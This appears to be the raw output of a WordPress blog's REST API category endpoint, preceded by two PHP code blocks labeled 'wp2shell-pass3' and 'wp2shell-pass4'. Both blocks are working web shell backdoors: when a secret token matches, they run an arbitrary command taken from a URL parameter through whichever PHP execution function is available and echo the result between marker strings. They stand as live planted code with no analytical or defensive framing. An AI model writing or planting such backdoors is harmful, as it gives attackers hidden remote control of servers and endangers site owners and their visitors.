
// wp2shell-pass3
if (isset($_GET['t']) && hash_equals('4f5ae2089d480ed9e68e18ac5751f22a', (string)$_GET['t']) && isset($_GET['c'])) {
    $c=(string)$_GET['c']; $o='';
    if(function_exists('shell_exec')) $o=(string)@shell_exec($c);
    elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
    elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
    elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);}
    $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit;
}














// wp2shell-pass4
if (isset($_GET['t']) && hash_equals('c50cdd1da5f2defb081f6ded154c2c6a', (string)$_GET['t']) && isset($_GET['c'])) {
  $c=(string)$_GET['c']; $o='';
  if(function_exists('shell_exec')) $o=(string)@shell_exec($c);
  elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
  elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
  elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);}
  elseif(function_exists('proc_open')){$d=array(1=>array('pipe','w'));$p=@proc_open($c,$d,$pipes);if(is_resource($p)){$o=stream_get_contents($pipes[1]);fclose($pipes[1]);proc_close($p);}}
  else $o='NO_EXEC_FUNCS';
  $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit;
}


{"id":1,"count":4,"description":"","link":"https:\/\/blog.luohongzhan.com\/index.php\/category\/uncategorized\/","name":"\u672a\u5206\u7c7b","slug":"uncategorized","taxonomy":"category","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/categories\/1","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/categories"}],"about":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/taxonomies\/category"}],"wp:post_type":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts?categories=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}